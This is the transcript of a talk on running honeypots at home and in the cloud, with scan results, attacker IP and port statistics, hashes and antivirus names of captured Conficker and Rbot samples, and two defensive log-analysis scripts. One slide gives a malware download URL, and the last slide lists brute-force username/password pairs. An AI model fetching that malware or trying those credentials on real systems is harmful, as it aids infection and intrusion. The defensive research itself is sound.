Honeypots - November 8th Misec presentation
 

5 additional addendum pages added.
  • Insert video from Duck Dynasty here?
  • Put the ports opened up by dionaea and the results of an nmap scan
  • More interesting stats (by country?)
  • Re do the stats

Presentation Transcript

  • Honeypots
  • Agenda
    • About me
    • What is a honeypot?
    • Different kinds of honeypots
    • Honeypots I used
    • Different data I discovered
  • About me
    • Husband
    • Father
    • Geek
    • Gets distracted by shiny objects easily
    • Breaker/Fixer of things
  • This is not a honeypot.
  • Lance Spitzner’s definition of honeypots is as follows:
    • A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)
  • Open source
    • Argos
    • HIHAT (High Interaction Honeypot Analysis Toolkit)
    • Capture-HPC
    • Honeywall
      • Sebek (kernel module)
      • Qebek
  • Commercial
    • Windows XP SP0
    • Windows Vista SP0
  • Kippo
  • Open source
    • nepenthes
    • dionaea
    • Glastopf
    • Google Hack Honeypot
    • HoneyC
    • Honeyd
    • Thug
    • Kojoney
    • Amun
    • SAFER Honeypot (Spoofing Active Fingerprints w/ Enhanced Replies)
  • Commercial
    • Specter
    • KFSensor
    • Honeypoint
  • Clean-net
    • Wife and son’s laptops
  • Dirty-net
    • My desktop
  • ??
    • Honeybook
  • Medium interaction
    • Kippo
  • Low interaction
    • Amun
    • Glastopf
    • Dionaea
      • Local
      • “To the cloud”
  • Port / emulated service modules (Amun, Nepenthes and Dionaea columns)
    21: ftpd, ftp
    25: imail
    42: wins, wins
    69: tftp
    80: http, asn1, http
    105: mercury
    110: axigen, slmail, mdaemon
    135: dcom, dcom, epmap
    139: smb, ms06040, netdde; netbiosname, netdde
    143: lotusdomino
    443: iis, iis, https
    445: lsass, pnp, dnsv2, asn1, ms06070, ms08067, smb; asn1, dcom, lsass, ms08067, pnp; smb
    554: helix
    587: imail
    617: arkeia
    1023: sasserftpd, sasserftpd
    1025: msdtc; dcom, msdtc
    1080: mydoom
    1111: tivoli
    1433: mssql
    1434: mssql
    1581: tivoli
    1900: arc
    2101: msmq
    2103: msmq, msmq
    2105: msmq, msmq
    2107: msmq, msmq
    2380: goodtech
    2555: upnp
    2745: bagle, bagle
    2954: hpopenview
    2967: symantec, symantec
    2968: symantec, symantec
    3127: mydoom, mydoom
    3128: mydoom
    3140: optix
    3268: trend
    3306: mysql
    3372: msdtc, msdtc
    3628: trend
    5000: upnp, upnp
    5060: sip
    5168: trend
    5554: sasserftpd, sasserftpd
    6070: arc
    6101: veritas
    6129: dameware, dameware
    7144: peercast
    8080: tivoli
    9999: maxdb
  • A low-interaction honeypot
    • Emulates a wide range of different vulnerabilities.
    • Payload transmitted by the attacker is analyzed.
    • Any download URL found is extracted.
    • Next, the honeypot tries to download the malicious software and store it on the local hard disc for further analysis.
  • A web application honeypot
    • Web server written in Python
    • Popular attack type emulation already in place
      • Remote file inclusion
      • Local file inclusion
      • HTML injection via POST requests
      • SQL injection emulation
  • Medium interaction SSH honeypot
    • Designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
    • Has a fake file system you can read/write to.
    • You can add additional commands.
  • “To catch bugs”
    • Meant to be a nepenthes successor
    • Python embedded
    • Can detect shellcodes
    • Supports IPv6 and TLS
    • A VoIP module has been developed as part of GSoC 2011
  • # Nmap 6.01 scan initiated Wed Jul 25 21:46:59 2012 as: nmap -A -oN /root/Desktop/dionaea_off.txt 192.168.1.197
    Nmap scan report for lp (192.168.1.197)
    Host is up (0.00075s latency).
    All 1000 scanned ports on lp (192.168.1.197) are closed
    MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)
    Too many fingerprints match this host to give specific OS details
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT      ADDRESS
    1   0.75 ms  lp (192.168.1.197)

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    # Nmap done at Wed Jul 25 21:47:01 2012 -- 1 IP address (1 host up) scanned in 2.28 seconds
  • # Nmap 6.01 scan initiated Wed Jul 25 21:47:16 2012 as: nmap -A -oN /root/Desktop/dionaea_on.txt 192.168.1.197
    Nmap scan report for lp (192.168.1.197)
    Host is up (0.00087s latency).
    Not shown: 990 closed ports
    PORT     STATE SERVICE      VERSION
    21/tcp   open  ftp          Dionaea honeypot ftpd
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    42/tcp   open  tcpwrapped
    80/tcp   open  http?
    |_http-title: Directory listing for /
    135/tcp  open  msrpc?
    443/tcp  open  ssl/https?
    |_http-title: Directory listing for /
    | ssl-cert: Subject: commonName=Nepenthes Development Team/organizationName=dionaea.carnivore.it/countryName=DE
    | Not valid before: 2012-07-26 01:47:37
    |_Not valid after:  2013-07-26 01:47:37
    445/tcp  open  microsoft-ds Dionaea honeypot smbd
    1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
    3306/tcp open  mysql        MySQL 5.0.54
    | mysql-info: Protocol: 10
    | Version: 5.0.54
    | Thread ID: 1729232896
    | Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
    | Status: Autocommit
    |_Salt: aaaaaaaa
    5060/tcp open  sip          (SIP end point; Status: 200 OK)
    5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)
    | ssl-cert: Subject: commonName=Nepenthes Development Team/organizationName=dionaea.carnivore.it/countryName=DE
    | Not valid before: 2012-07-26 01:47:37
    |_Not valid after:  2013-07-26 01:47:37
    4 services unrecognized despite returning data.
    MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Linux 2.6.X|3.X
    OS CPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3
    OS details: Linux 2.6.38 - 3.2
    Network Distance: 1 hop

    Host script results:
    |_nbstat: NetBIOS name: LP, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-security-mode:
    |   Account that was used for smb scripts: guest
    |   User-level authentication
    |   SMB Security: Challenge/response passwords supported
    |_  Message signing disabled (dangerous, but default)
    | smb-os-discovery:
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   NetBIOS computer name: HOMEUSER-
  • 14 pcap files, total of 102 MB
    • 129 “replay” files – 4 MB
    • 2 log files
      • Error log
      • Activity log
    • 2 SQLite database files
      • logsqlite – activity log, but in SQLite format
      • sipaccounts
    • 1 malicious executable
  • Day 1
    • 44 unique IP addresses
    • Time it took to get connections – 14 minutes
  • Day 2
    • xx unique IP addresses
    • Time it took to get connections –
    • Malicious file uploaded
    • Never live with the results of one tool, always use multiple tools!!
  • TCP Port | Occurrences | Protocol
    23 | 46 | Telnet
    22 | 42 | SSH
    80 | 40 | HTTP
    1080 | 38 | SOCKS Proxy
    135 | 34 | DCE Endpoint
    73 | 26 | NETRJS
    808 | 20 | Net.TCP Port Sharing
    25 | 15 | SMTP
    993 | 14 | IMAPS
    110 | 11 | POP3
    139 | 9 | NetBIOS
    1 | 8 | TCPMUX
    21 | 6 | FTP
    79 | 6 | Finger
    143 | 5 | IMAP
    587 | 5 | SMTP (Email message submission)
    995 | 5 | POP3 over TLS/SSL
    1096 | 5 | ??
    43 | 4 | WHOIS
    81 | 4 | Torpack – Onion routing
  • IP address | Occurrences
    184.171.169.60 | 69
    74.63.195.90 | 19
    184.164.150.13 | 9
    64.31.14.106 | 5
    101.78.154.123 | 4
    118.122.188.96 | 3
    12.134.192.58 | 3
    175.16.97.164 | 3
    178.95.22.152 | 3
    184.52.56.26 | 3
    199.188.104.83 | 3
    211.147.3.19 | 3
    221.2.209.46 | 3
    64.31.29.62 | 3
    71.99.147.51 | 3
    117.27.137.48 | 2
    120.151.204.106 | 2
    121.52.71.115 | 2
    14.102.115.51 | 2
    199.19.94.85 | 2
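The per-port and per-source counts on the stats slides can be regenerated straight from dionaea's logsqlite file rather than by hand, which also makes it easy to drop your own nmap scan from the Day 1 numbers. The script below is an added example, not one of the talk's scripts: the table and column names are my recollection of dionaea's logsql schema (check them against your file with `.schema`), and every row is constructed sample data.

```python
import sqlite3
from collections import Counter

# Assumed shape of dionaea's logsqlite file: table and column names follow the
# logsql module as I remember it, trimmed to what this script needs. Check
# them against your own file first (sqlite3 logsql.sqlite .schema).
SCHEMA = """
CREATE TABLE connections (
    connection           INTEGER PRIMARY KEY,
    connection_type      TEXT,     -- 'accept' = inbound hit, 'connect' = our outbound fetch
    connection_transport TEXT,
    connection_protocol  TEXT,     -- dionaea service that answered (smbd, mssqld, ...)
    connection_timestamp INTEGER,
    local_port           INTEGER,
    remote_host          TEXT,
    remote_port          INTEGER
);
CREATE TABLE downloads (
    download          INTEGER PRIMARY KEY,
    connection        INTEGER,
    download_url      TEXT,
    download_md5_hash TEXT
);
"""

# Constructed sample rows (not real captures). The 192.168.1.5 rows stand in
# for the operator's own nmap scan, which the Day 1 slide says inflated the
# connection count; the 'connect' row is dionaea fetching a payload via TFTP.
SAMPLE_CONNECTIONS = [
    # (type, transport, protocol, timestamp, local_port, remote_host, remote_port)
    ("accept",  "tcp", "mssqld",   1352088000, 1433, "175.23.26.55",   50123),
    ("accept",  "tcp", "mssqld",   1352088060, 1433, "175.23.26.55",   50124),
    ("accept",  "tcp", "mssqld",   1352088120, 1433, "61.147.103.85",  41000),
    ("accept",  "tcp", "smbd",     1352088180,  445, "211.22.54.147",  33001),
    ("accept",  "tcp", "smbd",     1352088240,  445, "42.121.84.187",  33002),
    ("accept",  "tcp", "epmapper", 1352088300,  135, "69.57.27.138",    1045),
    ("accept",  "tcp", "mysqld",   1352088360, 3306, "66.225.253.122", 55555),
    ("accept",  "tcp", "httpd",    1352088420,   80, "192.168.1.5",    60000),
    ("accept",  "tcp", "smbd",     1352088421,  445, "192.168.1.5",    60001),
    ("connect", "udp", "tftp",     1352088305,    0, "69.57.27.138",      69),
]
SAMPLE_DOWNLOADS = [
    # (connection id, url, md5): two fetches of the same binary (URLs constructed)
    (6, "tftp://69.57.27.138/payload.exe", "aff643a5014a9d8e98b24fa4dac11623"),
    (4, "smb://211.22.54.147/payload.exe", "aff643a5014a9d8e98b24fa4dac11623"),
]


def load_sample_db():
    """Build an in-memory database shaped like dionaea's logsqlite file."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany(
        "INSERT INTO connections (connection_type, connection_transport, "
        "connection_protocol, connection_timestamp, local_port, remote_host, "
        "remote_port) VALUES (?, ?, ?, ?, ?, ?, ?)",
        SAMPLE_CONNECTIONS)
    db.executemany(
        "INSERT INTO downloads (connection, download_url, download_md5_hash) "
        "VALUES (?, ?, ?)", SAMPLE_DOWNLOADS)
    return db


def inbound_hits(db, exclude=()):
    """(local_port, protocol, remote_host) for every accepted inbound
    connection, dropping hosts in `exclude` such as your own scanning box."""
    rows = db.execute(
        "SELECT local_port, connection_protocol, remote_host FROM connections "
        "WHERE connection_type = 'accept' ORDER BY connection_timestamp")
    return [(p, proto, host) for p, proto, host in rows if host not in exclude]


def port_counts(db, exclude=()):
    """Rows of (port, protocol, occurrences), busiest first: the
    'TCP Port / Occurrences / Protocol' table from the slides."""
    c = Counter((port, proto) for port, proto, _ in inbound_hits(db, exclude))
    return [(port, proto, n) for (port, proto), n in c.most_common()]


def remote_host_counts(db, exclude=()):
    """Rows of (remote_host, occurrences), busiest first."""
    return Counter(h for _, _, h in inbound_hits(db, exclude)).most_common()


def downloads_by_hash(db):
    """Map MD5 -> URLs it was fetched from, so each distinct binary is looked
    up on VirusTotal once rather than once per download."""
    groups = {}
    for url, md5 in db.execute(
            "SELECT download_url, download_md5_hash FROM downloads ORDER BY download"):
        groups.setdefault(md5, []).append(url)
    return groups


if __name__ == "__main__":
    db = load_sample_db()
    for port, proto, n in port_counts(db, exclude={"192.168.1.5"}):
        print(f"{port:>5} {n:>4}  {proto}")
    for host, n in remote_host_counts(db, exclude={"192.168.1.5"}):
        print(f"{host:<16} {n}")
    for md5, urls in downloads_by_hash(db).items():
        print(md5, len(urls), "download(s)")
```

Point the `sqlite3.connect` call at the real logsqlite file once the column names check out; the `exclude` set is where your own management and scanning addresses go.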
  • 184.171.169.60 – http://www.securedservers.com/index.php
  • 74.63.195.90 – http://limestonenetworks.com/
  • OS | Occurrences
    Linux | 14
    Windows | 30
    Solaris | 1
  • Link | Occurrences
    ethernet/modem | 54
    IPv6/IPIP | 3
    pppoe (DSL) | 15
    sometimes DSL (3) | 4
  • OS version – Windows | Occurrences
    XP/2000 (RFC1323+, w+, tstamp-) | 2
    XP SP1+, 2000 SP3 | 3
    2000 SP4, XP SP1+ | 22
    2000 SP2+, XP SP1+ (seldom 98) | 3
  • OS version – Linux | Occurrences
    2.6 (newer, 1) | 1
    2.6 (newer, 2) | 2
    2.6 (newer, 3) | 4
    2.6, seldom 2.4 (older, 2) | 5
    2.6, seldom 2.4 (older, 4) | 2
  • Day 1
    • Goals
      • Get the honeypot installed and up and running
      • Get some traffic
      • Run some packet captures
    • Timeline
      1. 2:55 pm
         1. Started dionaea
         2. I immediately ran an nmap scan and it just lit up like a Christmas tree.
         3. That accounts for 1053 connection attempts.
         4. 6:44 pm – Started Wireshark packet capture
      2. 3:07 pm – the first “attacker” appears (me)
         1. 6:58 pm – the first connection appears
  • Day 2
    • Goals
      • Start saving packet captures (with “no arp” on the capture filter)
      • Get some traffic
      • Catch some malware?
    • Timeline
      1. 11:12:04 am
         1. Get a connection from 69.57.27.138
         2. Attempts connection to TCP port 135 (epmap). It gets a SYN, ACK.
      2. 11:12:06 am
         1. TFTP session is initiated and malware is being dropped on the system
      3. 11:12:42 am
         1. TFTP session completes
      4. 14:39:47 am
         1. He’s back! (Process from 1.1 starts all over again)
  • MD5 – aff643a5014a9d8e98b24fa4dac11623
    • VirusTotal – 40/42 detection ratio
      • Rbot
    • ThreatExpert
      • A malicious backdoor trojan that runs in the background and allows remote access to the compromised system
      • A network-aware worm that attempts to replicate across the existing network(s)
  • IP Address and Domain Information – Chrome extension (from TCPIPUtils)
    OrgName: Algona Municipal Utilities
    OrgId: AMU-6
    Address: 104 West Call Street
    Address: PO Box 10
    City: Algona
    StateProv: IA
    PostalCode: 50511
    Country: US
    RegDate: 1/20/2011
    Updated: 7/6/2011
    http://www.netamu.com/
  • Goals
    • To the cloud!
  • Round 2
    • Amazon EC2 Ubuntu 12.04 Micro instance
      • Virginia
      • Oregon
      • São Paulo, South America
      • Ireland
      • Tokyo (Thanks Sukotto_san!)
    • Unable to do
      • Singapore
  • Virginia – 3 files
  • Oregon – 0 files
  • South America – 1 file
  • Tokyo – 1 file
  • Ireland – 40 files!!
  • Virginia
    • 7a5acd7da5a5d7845a4bcd1a90019e69
      • VirusTotal – 40/44
      • W32/Conficker.worm.gen.a – McAfee
    • 607a710f446de466fcb3be1e5c189c71
      • VirusTotal – 42/44
      • VirScan.org – File name: azsvf.nmg
    • 344770974dce3c039b48d27bd4e9a114
      • VirusTotal – 41/42
      • W32/Conficker.worm – McAfee
      • ThreatExpert link – http://www.threatexpert.com/report.aspx?md5=344770974dce3c039b48d27bd4e9a114
  • IP Address | Occurrences
    175.23.26.55 | 11
    61.147.103.85 | 7
    211.22.54.147 | 3
    42.121.84.187 | 2
    31.13.232.59 | 2
    182.1.23.144 | 2
    173.163.222.22 | 1
    211.22.54.145 | 1
  • TCP Port | Occurrences | Protocol
    1433 | 20 | MSSQL Server
    445 | 6 | Microsoft-DS Active Directory, Windows shares
    139 | 2 | NetBIOS Session Service
    3389 | 1 | Microsoft Terminal Server (RDP)
  • 175.23.26.55 – Port 1433 – http://www.chinaunicom.com.hk/en/home/default.html
  • 61.147.103.85 – Port 1433 – http://en.chinatelecom.com.cn/
  • 7a5acd7da5a5d7845a4bcd1a90019e69 - Net-Worm.Win32.Kido.ih
  • 344770974dce3c039b48d27bd4e9a114 - Net-Worm.Win32.Kido.ih http://www.telkomsel.com
  • 344770974dce3c039b48d27bd4e9a114
  • 607a710f446de466fcb3be1e5c189c71 – http://www.hinet.net/
  • 607a710f446de466fcb3be1e5c189c71
  • South America – 1 file
    • 0139abdd353ca804aa654c8db556dc46
      • VirusTotal – 32/41
      • Kaspersky – Trojan.Win32.Jorik.IRCbot.qrq
  • 0139abdd353ca804aa654c8db556dc46
  • Tokyo – 2 files
    • 933be7b1b0077563f639a99d131bde7f
      • From: http://esendfile.com/xx81.exe
      • File name: xx81.exe
      • Analysis date: 2012-11-02 23:08:50 UTC
      • VirusTotal – 33/44
      • Kaspersky – Trojan-Dropper.Win32.Injector.fyym
      • Microsoft – VirTool:Win32/CeeInject.gen!IJ
      • Sophos – Troj/ProcInj-N
    • csrss.exe
      • From: smb://87.241.82.99
      • (Didn’t save)
  • 87.241.82.99
  • TCP Port | Occurrences | Protocol
    3306 | 909 | MySQL database system
    176 | 81 | ??
    1433 | 49 | MSSQL Server
    34354 | 38 | ??
    3389 | 34 | Microsoft Terminal Server (RDP)
    80 | 31 | Hypertext Transfer Protocol (HTTP)
    110 | 18 | Post Office Protocol v3 (POP3)
    445 | 18 | Microsoft-DS Active Directory, Windows shares
    25 | 13 | Simple Mail Transfer Protocol (SMTP)
    139 | 11 | NetBIOS Session Service
    23 | 9 | Telnet protocol
    135 | 6 | Microsoft EPMAP (End Point Mapper), also known as DCE/RPC Locator service, used to remotely manage services including DHCP server, DNS server and WINS. Also used by DCOM
  • IP address | Occurrences
    66.225.253.122 | 273
    119.1.96.68 | 192
    58.211.69.182 | 179
    61.160.200.46 | 99
    210.195.52.9 | 81
    183.136.144.36 | 78
    202.165.179.118 | 38
    37.46.112.145 | 31
    58.16.63.214 | 30
    201.116.201.248 | 28
    121.245.220.214 | 24
    165.225.128.229 | 18
  • 66.225.253.122 – Port 3306 – http://www.servercentral.com/
  • 119.1.96.68 – Port 3306 – http://www.chinanet.com
  • Ireland – 40 files
    • VirusTotal results
      • Kaspersky
      • Microsoft
      • Sophos
    • This was from a time frame spanning between
  • File name (MD5) | Detection ratio | Analysis date | Kaspersky | Microsoft | Sophos
    8aefa2d9f0a6cf4d70ecc484a953c007 | 37 / 42 | 2011-06-25 22:20:53 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    7c3c59692a7d4c4f53187a4284bc53df | 40 / 44 | 2011-09-13 20:56:07 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    6dd2d5993d634aeab90682ad2e59376f | 38 / 43 | 2011-12-07 07:00:30 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    deaf1f22c26f974a7977ba5678e159a9 | 36 / 41 | 2012-08-05 02:50:41 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.C | Mal/Conficker-A
    4d2694b90c3fb8e6f9116c20e8cbfa91 | 38 / 41 | 2012-08-28 05:32:10 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    9abd8f29a3d24c1c6c32260e8493ac43 | 29 / 31 | 2012-09-22 16:47:01 UTC | Backdoor.Win32.Rbot.bqj | n/a | n/a
    0c059b0d1d5a03f69a21185987c17d5c | 42 / 44 | 2012-11-05 05:32:43 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.C | Mal/Conficker-A
    0d8478eec0a3d9632e7d7cd432f7ee09 | 41 / 44 | 2012-11-05 05:32:52 UTC | Backdoor.Win32.Rbot.bqj | Backdoor:Win32/Rbot | W32/Rbot-Gen
    16ebc1c90231a9e78ed1ede0a58e58cb | 18 / 21 | 2012-11-05 05:33:29 UTC | n/a | n/a | Mal/Conficker-A
    2aeae56802c4efc7b68e8e1f6b04edea | 41 / 44 | 2012-11-05 05:35:09 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    2e8da5a55865a091864a4338ef4d2e44 | 42 / 44 | 2012-11-05 05:35:26 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.C | Mal/Conficker-A
    344770974dce3c039b48d27bd4e9a114 | 42 / 44 | 2012-11-05 05:35:49 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    3d17d15d86c34874039e77341aabb1c4 | 41 / 44 | 2012-11-05 05:36:33 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    3f46687b1f8d403b901e46a3704508ea | 42 / 44 | 2012-11-05 05:36:46 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    4934ddd5bdfa5635f946667d66c834b6 | 41 / 43 | 2012-11-05 05:37:25 UTC | Trojan.Win32.Genome.mvoq | Worm:Win32/Conficker.B | Mal/Conficker-A
    4fbcfb9557656c96edb479e30eef2fb3 | 43 / 44 | 2012-11-05 05:38:02 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    574cf0062911c8c4eca2156187b8207d | 42 / 44 | 2012-11-05 05:38:35 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    58a4a4bbba4d75dbc6c6c7c9b439955d | 39 / 43 | 2012-11-05 05:38:39 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    59fe65fad4849c95ed538475c1f707cf | 42 / 44 | 2012-11-05 05:38:51 UTC | Trojan.Win32.Genome.wjuk | Worm:Win32/Conficker.C | Mal/Conficker-A
    5cd426dbec0619b9500a96f24b3886c8 | 41 / 44 | 2012-11-05 05:39:05 UTC | Net-Worm.Win32.Kido.ks | Worm:Win32/Conficker.B | Mal/Conficker-A
    6ce65eea05ae7fc659a455b5e1589ab0 | 40 / 43 | 2012-11-05 05:40:44 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    78c9042bbcefd65beaa0d40386da9f89 | 39 / 40 | 2012-11-05 05:41:28 UTC | n/a | Worm:Win32/Conficker.C | Mal/Conficker-A
    7bb455ea4a77b24478fba4de145115eb | 40 / 43 | 2012-11-05 05:41:45 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    94e689d7d6bc7c769d09a59066727497 | 42 / 43 | 2012-11-05 05:43:42 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    961cfb405f6aa100bf6a3d66507eda18 | 41 / 44 | 2012-11-05 05:43:54 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    9c09418c738e265a27e6c599f43d86ab | 43 / 44 | 2012-11-05 05:44:19 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    a312c8b1adb48a60b0f755a5711b8995 | 43 / 44 | 2012-11-05 05:44:57 UTC | Trojan.Win32.Genome.hkck | Worm:Win32/Conficker.C | Mal/Conficker-A
    acf4da36e762084070f8138a43144759 | 43 / 44 | 2012-11-05 05:45:49 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    b081022fc581decf4c8640dbc74a9198 | 42 / 43 | 2012-11-05 05:46:09 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    bc9d30d59788c70060d7eabd6ab5e663 | 41 / 44 | 2012-11-05 05:46:57 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    bdc18dfcfa63861aaa9d9fb95919d32a | 42 / 44 | 2012-11-05 05:47:01 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    c7277972654775258bf3d4d6936eb1b0 | 41 / 44 | 2012-11-05 05:48:00 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    cae4b7963f5e43033664299a4d5bd176 | 43 / 44 | 2012-11-05 05:48:11 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    d45895e3980c96b077cb4ed8dc163db8 | 43 / 44 | 2012-11-05 05:48:48 UTC | Trojan.Win32.Genome.taql | Worm:Win32/Conficker.C | Mal/Conficker-A
    d90b4a84515f3a4d7d4ca716d9263a5e | 42 / 44 | 2012-11-05 05:49:11 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    e1855fbe6cf64738bffb9dc195e38ed1 | 41 / 44 | 2012-11-05 05:49:46 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    e53ed987e82ad7bf076c23d91401cac7 | 42 / 44 | 2012-11-05 05:50:05 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    ef87b673c8e3b77bdf2342e42e1b5f0c | 43 / 44 | 2012-11-05 05:50:49 UTC | Net-Worm.Win32.Kido.dam.ba | Worm:Win32/Conficker.C | Mal/Conficker-A
    fb34cb2d017899592aa1c8d578bfa455 | 41 / 44 | 2012-11-05 05:51:36 UTC | Net-Worm.Win32.Kido.ih | Worm:Win32/Conficker.B | Mal/Conficker-A
    d41d8cd98f00b204e9800998ecf8427e | 0 / 42 | 2012-11-05 16:11:31 UTC | - | - | -
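The tables above (Virginia and Ireland) were built by hashing each captured binary and looking the hash up on VirusTotal. The script below is an added example, not one of the author's scripts: it walks a directory of captured files, hashes them in chunks, groups identical samples so each distinct binary is looked up once, and sets aside zero-length files. The last row of the Ireland table, d41d8cd98f00b204e9800998ecf8427e at 0 / 42, is exactly that case: it is the MD5 of zero bytes, i.e. an empty download, and there is nothing to scan. The directory contents are constructed sample bytes, not malware.

```python
import hashlib
import os
import tempfile

# MD5 of zero bytes. A "sample" carrying this hash is an empty file, which is
# why it scores 0 detections: there is nothing in it to detect.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"


def md5_of_bytes(data):
    return hashlib.md5(data).hexdigest()


def hash_file(path):
    """Return (md5, sha256, size) for a file, reading it in 64 KiB chunks so a
    large capture never has to be held in memory at once."""
    md5, sha256, size = hashlib.md5(), hashlib.sha256(), 0
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            md5.update(chunk)
            sha256.update(chunk)
            size += len(chunk)
    return md5.hexdigest(), sha256.hexdigest(), size


def triage_binaries(directory):
    """Walk a honeypot's captured-binaries directory.

    Returns (unique, empty):
      unique: md5 -> {"sha256": ..., "size": ..., "files": [names]}
      empty:  [(name, md5)] for zero-length files, reported rather than queued
    """
    unique, empty = {}, []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        md5, sha256, size = hash_file(path)
        if size == 0:
            empty.append((name, md5))
            continue
        entry = unique.setdefault(md5, {"sha256": sha256, "size": size, "files": []})
        entry["files"].append(name)
    return unique, empty


def lookup_queue(unique):
    """Hashes worth sending to a VirusTotal report lookup: one per distinct binary."""
    return sorted(unique)


# Constructed sample directory (not real malware): two identical files, one
# different file and one zero-length file standing in for an interrupted download.
SAMPLE_FILES = {
    "sample-one.bin":      b"MZ\x90\x00constructed sample one",
    "sample-one-copy.bin": b"MZ\x90\x00constructed sample one",
    "sample-two.bin":      b"MZ\x90\x00constructed sample two",
    "truncated.bin":       b"",
}


def make_sample_dir():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    d = tempfile.mkdtemp(prefix="binaries-")
    for name, data in SAMPLE_FILES.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d


if __name__ == "__main__":
    unique, empty = triage_binaries(make_sample_dir())
    for md5 in lookup_queue(unique):
        info = unique[md5]
        print(md5, info["size"], "bytes,", len(info["files"]), "copies")
    for name, md5 in empty:
        print("empty download, skipped:", name, md5)
```

Run it against the real directory by replacing `make_sample_dir()` with the path; the SHA-256 is kept alongside the MD5 because VirusTotal accepts either, and it avoids collisions between unrelated files sharing an MD5.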
  • TCP Port | Occurrences | Protocol
    3306 | 205 | MySQL database system
    1433 | 173 | MSSQL Server
    445 | 154 | Microsoft-DS Active Directory, Windows shares
    5060 | 45 | Session Initiation Protocol (SIP)
    139 | 38 | NetBIOS Session Service
    80 | 32 | Hypertext Transfer Protocol (HTTP)
    3389 | 13 | Microsoft Terminal Server (RDP)
    1080 | 11 | SOCKS proxy
    135 | 6 | DCE endpoint resolution
    9097 | 5 | ??
    23 | 3 | Telnet protocol
    110 | 3 | Post Office Protocol v3 (POP3)
  • IP address | Occurrences | GeoIP location | Interesting notes
    61.147.103.137 | 147 | Beijing, Beijing, China (CN) | TCPIPUtils.com – 1 of 4 spam databases; 48 different websites near this IP
    188.161.92.153 | 44 | Gaza, Palestinian Territory (PS) | TCPIPUtils.com – 1 of 4 spam databases
    42.121.19.84 | 27 | Hangzhou, Zhejiang, China (CN) | TCPIPUtils.com – 1 of 4 spam databases
    203.162.35.88 | 23 | Vietnam (VN) |
    125.65.108.65 | 16 | Chengdu, Sichuan, China (CN) | 68 different websites near this IP
    181.0.218.144 | 16 | Buenos Aires, Distrito Federal, Argentina (AR) |
    65.18.174.167 | 16 | Near Wichita, KS | 26 different websites near this IP including datemarriedwomen.org
    111.249.26.205 | 14 | Taipei, Tai-pei, Taiwan (TW) | Same website where malware from Virginia came from.
    211.154.213.122 | 12 | Beijing, Beijing, China (CN) | TCPIPUtils.com – 1 of 4 spam databases
    42.120.0.238 | 12 | Hangzhou, Zhejiang, China (CN) |
    187.35.61.105 | 10 | São Paulo, Sao Paulo, Brazil (BR) | TCPIPUtils.com – 1 of 4 spam databases; 17 different websites near this IP
    210.211.117.81 | 10 | Vietnam (VN) |
  • t1na/t1na pass/pass oscar/oscar luciana/luciana
    t1na/tina f/f bot/bot volume/volume
    alexis/alexis roberto/roberto ba/ba boootz/boootz
